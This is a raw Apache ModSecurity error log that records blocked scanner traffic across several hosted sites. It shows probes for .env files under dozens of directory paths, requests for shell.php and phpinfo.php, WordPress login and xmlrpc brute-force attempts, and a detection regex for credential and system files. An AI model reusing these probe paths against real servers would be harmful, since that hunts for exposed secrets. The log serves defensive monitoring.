[Tue May 26 16:17:06.317121 2026] [security2:error] [pid 782634:tid 782779] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Kf_P9qBfeb1w76ZSEAAAAA8"]
[Tue May 26 16:17:06.508026 2026] [security2:error] [pid 782634:tid 782854] [client 62.60.130.233:62961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bramas.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV6Kv_P9qBfeb1w76ZSKQAAAFo"], referer: https://www.google.co.uk/search?q=wordpress
[Tue May 26 16:17:06.853091 2026] [security2:error] [pid 782634:tid 782848] [client 62.60.130.233:63603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bramas.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahV6Kv_P9qBfeb1w76ZSOwAAAFQ"]
[Tue May 26 16:17:06.867130 2026] [security2:error] [pid 782634:tid 782843] [client 20.192.3.167:2321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/php8.php"] [unique_id "ahV6Kv_P9qBfeb1w76ZSPAAAAE8"]
[Tue May 26 16:17:07.228295 2026] [security2:error] [pid 782634:tid 782872] [client 192.253.248.169:39784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/.env"] [unique_id "ahV6K__P9qBfeb1w76ZSQgAAAGw"]
[Tue May 26 16:17:07.322151 2026] [security2:error] [pid 782634:tid 782832] [client 31.57.184.107:60221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV6K__P9qBfeb1w76ZSSQAAAEQ"]
[Tue May 26 16:17:07.379841 2026] [security2:error] [pid 782634:tid 782770] [client 192.253.248.169:39784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/api/.env"] [unique_id "ahV6K__P9qBfeb1w76ZSTQAAAAY"]
[Tue May 26 16:17:07.532598 2026] [security2:error] [pid 782634:tid 782836] [client 192.253.248.169:39784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/backend/.env"] [unique_id "ahV6K__P9qBfeb1w76ZSUAAAAEg"]
[Tue May 26 16:17:07.629331 2026] [security2:error] [pid 782634:tid 782855] [client 103.44.52.196:52712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6K__P9qBfeb1w76ZSTwAAAFs"]
[Tue May 26 16:17:07.629530 2026] [security2:error] [pid 782634:tid 782855] [client 103.44.52.196:52712] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6K__P9qBfeb1w76ZSTwAAAFs"]
[Tue May 26 16:17:07.753245 2026] [security2:error] [pid 782634:tid 782781] [client 192.253.248.169:39784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.248.253.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.198.85"] [uri "/phpinfo.php"] [unique_id "ahV6K__P9qBfeb1w76ZSUgAAABE"]
[Tue May 26 16:17:07.767796 2026] [security2:error] [pid 782634:tid 782816] [client 20.192.3.167:9720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/p.php"] [unique_id "ahV6K__P9qBfeb1w76ZSVAAAADQ"]
[Tue May 26 16:17:08.511528 2026] [security2:error] [pid 782634:tid 782799] [client 192.253.248.169:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/laravel/.env"] [unique_id "ahV6LP_P9qBfeb1w76ZSbAAAACM"]
[Tue May 26 16:17:08.632966 2026] [security2:error] [pid 782634:tid 782768] [client 20.192.3.167:3526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/php.php"] [unique_id "ahV6LP_P9qBfeb1w76ZScAAAAAQ"]
[Tue May 26 16:17:08.967750 2026] [security2:error] [pid 782634:tid 782813] [client 192.253.248.169:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/core/.env"] [unique_id "ahV6LP_P9qBfeb1w76ZSfgAAADE"]
[Tue May 26 16:17:09.118151 2026] [security2:error] [pid 782634:tid 782870] [client 192.253.248.169:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/app/.env"] [unique_id "ahV6Lf_P9qBfeb1w76ZSfwAAAGo"]
[Tue May 26 16:17:09.416111 2026] [security2:error] [pid 782634:tid 782837] [client 20.192.3.167:2497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/past.php"] [unique_id "ahV6Lf_P9qBfeb1w76ZSiwAAAEk"]
[Tue May 26 16:17:09.420320 2026] [security2:error] [pid 782634:tid 782810] [client 192.253.248.169:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/dev/.env"] [unique_id "ahV6Lf_P9qBfeb1w76ZSjAAAAC4"]
[Tue May 26 16:17:09.491365 2026] [security2:error] [pid 782634:tid 782827] [client 106.219.85.83:13400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Lf_P9qBfeb1w76ZSjwAAAD8"]
[Tue May 26 16:17:09.491452 2026] [security2:error] [pid 782634:tid 782827] [client 106.219.85.83:13400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Lf_P9qBfeb1w76ZSjwAAAD8"]
[Tue May 26 16:17:09.585164 2026] [security2:error] [pid 782634:tid 782832] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Lf_P9qBfeb1w76ZSgwAAAEQ"]
[Tue May 26 16:17:09.874707 2026] [security2:error] [pid 782634:tid 782767] [client 192.253.248.169:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/server/.env"] [unique_id "ahV6Lf_P9qBfeb1w76ZSmAAAAAM"]
[Tue May 26 16:17:10.063826 2026] [core:error] [pid 782634:tid 782877] (104)Connection reset by peer: [client 45.154.98.76:57164] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:17:10.317267 2026] [security2:error] [pid 782634:tid 782879] [client 20.192.3.167:2353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/root.php"] [unique_id "ahV6Lv_P9qBfeb1w76ZSpAAAAHM"]
[Tue May 26 16:17:10.329035 2026] [security2:error] [pid 782634:tid 782825] [client 192.253.248.169:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/staging/.env"] [unique_id "ahV6Lv_P9qBfeb1w76ZSpQAAAD0"]
[Tue May 26 16:17:10.478067 2026] [security2:error] [pid 782634:tid 782885] [client 192.253.248.169:39794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.248.253.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.198.85"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahV6Lv_P9qBfeb1w76ZSrAAAAHk"]
[Tue May 26 16:17:10.746267 2026] [security2:error] [pid 782634:tid 782800] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Lv_P9qBfeb1w76ZSqAAAACQ"]
[Tue May 26 16:17:11.072972 2026] [security2:error] [pid 782634:tid 782795] [client 192.253.248.169:39804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/demo/.env"] [unique_id "ahV6L__P9qBfeb1w76ZSuQAAAB8"]
[Tue May 26 16:17:11.221898 2026] [security2:error] [pid 782634:tid 782836] [client 192.253.248.169:39804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/portal/.env"] [unique_id "ahV6L__P9qBfeb1w76ZSugAAAEg"]
[Tue May 26 16:17:11.230980 2026] [security2:error] [pid 782634:tid 782849] [client 20.192.3.167:11006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/r.php"] [unique_id "ahV6L__P9qBfeb1w76ZSuwAAAFU"]
[Tue May 26 16:17:11.519409 2026] [security2:error] [pid 782634:tid 782810] [client 192.253.248.169:39804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/crm/.env"] [unique_id "ahV6L__P9qBfeb1w76ZSxAAAAC4"]
[Tue May 26 16:17:11.674346 2026] [security2:error] [pid 782634:tid 782801] [client 192.253.248.169:39804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/test/.env"] [unique_id "ahV6L__P9qBfeb1w76ZSxwAAACU"]
[Tue May 26 16:17:11.822602 2026] [security2:error] [pid 782634:tid 782783] [client 192.253.248.169:39804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/config/.env"] [unique_id "ahV6L__P9qBfeb1w76ZSyAAAABM"]
[Tue May 26 16:17:11.945481 2026] [security2:error] [pid 782634:tid 782827] [client 14.170.171.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6L__P9qBfeb1w76ZSxgAAAD8"]
[Tue May 26 16:17:12.030539 2026] [security2:error] [pid 782634:tid 782847] [client 192.253.248.169:39804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/bot/.env"] [unique_id "ahV6MP_P9qBfeb1w76ZS0AAAAFM"]
[Tue May 26 16:17:12.100241 2026] [security2:error] [pid 782634:tid 782857] [client 20.192.3.167:4077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/sid3.php"] [unique_id "ahV6MP_P9qBfeb1w76ZS0wAAAF0"]
[Tue May 26 16:17:12.177796 2026] [security2:error] [pid 782634:tid 782864] [client 192.253.248.169:39804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.248.253.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.198.85"] [uri "/test.php"] [unique_id "ahV6MP_P9qBfeb1w76ZS1AAAAGQ"]
[Tue May 26 16:17:12.783751 2026] [security2:error] [pid 782634:tid 782807] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6MP_P9qBfeb1w76ZS4AAAACs"]
[Tue May 26 16:17:12.783845 2026] [security2:error] [pid 782634:tid 782885] [client 192.253.248.169:39814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/API/.env"] [unique_id "ahV6MP_P9qBfeb1w76ZS7gAAAHk"]
[Tue May 26 16:17:12.956170 2026] [security2:error] [pid 782634:tid 782881] [client 20.192.3.167:9165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/ss.php"] [unique_id "ahV6MP_P9qBfeb1w76ZS8wAAAHU"]
[Tue May 26 16:17:13.889939 2026] [security2:error] [pid 782634:tid 782854] [client 114.119.132.218:49293] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/libroreclamacion/registrar_reclamo.php"] [unique_id "ahV6Mf_P9qBfeb1w76ZTCQAAAFo"], referer: http://politica-global.com/
[Tue May 26 16:17:14.040269 2026] [security2:error] [pid 782634:tid 782871] [client 20.192.3.167:13960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/sts.php"] [unique_id "ahV6Mv_P9qBfeb1w76ZTDwAAAGs"]
[Tue May 26 16:17:14.275975 2026] [security2:error] [pid 782634:tid 782862] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Mf_P9qBfeb1w76ZTCAAAAGI"]
[Tue May 26 16:17:14.975235 2026] [security2:error] [pid 782634:tid 782842] [client 20.192.3.167:4114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/shell.php"] [unique_id "ahV6Mv_P9qBfeb1w76ZTMAAAAE4"]
[Tue May 26 16:17:15.427547 2026] [autoindex:error] [pid 782634:tid 782874] [client 43.153.87.54:59444] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:17:15.875126 2026] [security2:error] [pid 782634:tid 782794] [client 20.192.3.167:2515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/setup-config.php"] [unique_id "ahV6M__P9qBfeb1w76ZTSgAAAB4"]
[Tue May 26 16:17:15.954783 2026] [core:error] [pid 782634:tid 782837] (104)Connection reset by peer: [client 45.154.98.76:63259] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:17:16.733297 2026] [security2:error] [pid 782634:tid 782844] [client 20.192.3.167:4063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/t.php"] [unique_id "ahV6NP_P9qBfeb1w76ZTXQAAAFA"]
[Tue May 26 16:17:16.855146 2026] [security2:error] [pid 782634:tid 782857] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6NP_P9qBfeb1w76ZTVwAAAF0"]
[Tue May 26 16:17:17.674795 2026] [security2:error] [pid 782634:tid 782772] [client 20.192.3.167:1998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/up.php"] [unique_id "ahV6Nf_P9qBfeb1w76ZTdwAAAAg"]
[Tue May 26 16:17:18.091464 2026] [security2:error] [pid 782634:tid 782786] [client 103.44.52.196:44202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Nv_P9qBfeb1w76ZTlQAAABY"]
[Tue May 26 16:17:18.091573 2026] [security2:error] [pid 782634:tid 782786] [client 103.44.52.196:44202] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Nv_P9qBfeb1w76ZTlQAAABY"]
[Tue May 26 16:17:18.513899 2026] [security2:error] [pid 782634:tid 782770] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Nv_P9qBfeb1w76ZTlgAAAAY"]
